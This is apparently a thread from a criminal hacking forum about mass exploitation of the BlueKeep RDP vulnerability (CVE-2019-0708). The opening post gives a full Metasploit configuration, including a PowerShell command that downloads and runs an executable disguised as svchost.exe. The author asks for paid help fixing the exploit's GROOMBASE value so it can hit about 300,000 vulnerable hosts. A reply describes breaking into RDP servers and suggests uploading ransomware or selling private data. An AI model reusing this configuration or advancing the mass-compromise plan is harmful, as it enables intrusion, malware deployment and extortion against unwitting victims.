(CVE-2019-0708) - [BlueKeep] - Exploitation using Metasploit and custom PAYLOAD.

VoidZero

RAID array (forum rank)
User
Registered: 01.10.2020
Posts: 92
Reactions: 16
The configuration used is as follows:

1) use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
2) set RDP_CLIENT_IP 192.168.1.7
3) set RHOSTS file:/home/michael/Hosts.txt
4) set TARGET 1
5) set ForceExploit true
6) set PAYLOAD windows/x64/exec
7) set CMD "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.google.com/svchost.exe','svchost.exe');Start-Process 'svchost.exe'" [I also tried with a .PS1 (PowerShell script generated by "Unicorn": "https://github.com/trustedsec/unicorn"; with my .EXE attached as D&E)].
8) set GROOMSIZE 50

I tried locally using a VM (VirtualBox 6.1) with Windows 7. [In this case TARGET should be "2" and RHOSTS the local IPv6 address]: everything works well, but I get a BSOD, related to the DoS that is triggered.
So, no exploitation success.
The problem to be solved is inside GROOMBASE ("NonPagedPool - Start"). The default is wrong.
That's even more complex in mass exploitation.

Does anyone have an idea how to solve it? Not locally; (for that it's just necessary to get a dump of the VM's memory to retrieve the start address). I'm interested in being able to use it in mass exploitation. (I already have a large list of "vulnerable" RDPs.)

Any contribution will be appreciated.
Thanks in advance!

Best regards,
VoidZero.
 
did you fall from the moon?
http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/43115/
I already know/have done everything set out by the latter user. It's useless for me.
My objective is different; I don't want to create a Meterpreter session; I need to execute my .EXE.
Moreover, as it does not work in my case, it will not work by following his tutorial either; the core context is the same. The PROBLEM with the "NonPagedPool - Start" address (GROOMBASE) is valid in both cases, whatever the nature of the payload.

I found a potentially useful resource: " ".
[attachment: MnNonPagedPoolStart address.png]

In this way, it may be possible to use a "universal" GROOMBASE.
Further concepts:
[attachment: Windows 7 - NonPagedPool start address.png]

Anyway, on the opposite side: I asked the original author who developed the exploit, and this is his reply.
[attachment: Commento - zerosum0x0.png]

So, it's a confused situation.
 
It has been 1 month and 8 days since my help request.

Still no one has enough skill to solve the latter complexity?

(In case of concrete help, useful for reaching final success: I am willing to reward it economically, adequately!)
______

It's just the global GROOMBASE value that is missing.
Just that! Nothing more!
*This can be done through spraying a large (1GB) nonpaged pool address*.
______

Someone?
I’m waiting.
______

Thanks in advance!
Best regards,
VoidZero.
 
(Please note: I checked every RDP in the world exposed on port "3389" [the default one]; my final report: around 300,000 RDPs found still vulnerable to this vulnerability.)

[I already have the list. Everything else is ready. I just need to fix the exploitation script, as already said before.
That's why I'm so focused on that exploit.]
______

(*Think about it*).
 
Bro, I'll tell you this:
I checked 100 RDPs manually, because the exploit can work 1 time out of 10 or 100, but I wanted to get my hand in:
1. 40+ of them were infected with ransomware, most for over a year.
2. 30 - empty RDPs, last connection or change of system files 1 year+ ago.
3. 20 - ordinary, but not interesting for ransomware (if you want).
4. 2-3 - ordinary with info, maybe you can upload ransomware or sell private info.

And now the question: during a mass connection attempt, running the file with the hosts, I was able to access 10%. When punching manually, up to 98%, but I spent about 24 hours on 100 RDPs, somewhere less, somewhere more. Now the question is: how are you going to use this for 300,000 RDPs?
 
That's exactly the problem.
I should find a fix as soon as possible.
 
How do you want to fix this?
I can start the payload on one RDP; I ran the exploit with the same settings 10-15 times and did it. I think there is no fix for the stable work of this exploit, and the groom has nothing to do with it.
 
As already said and reported: by using a large (1GB) "NonPaged Pool Address".
 

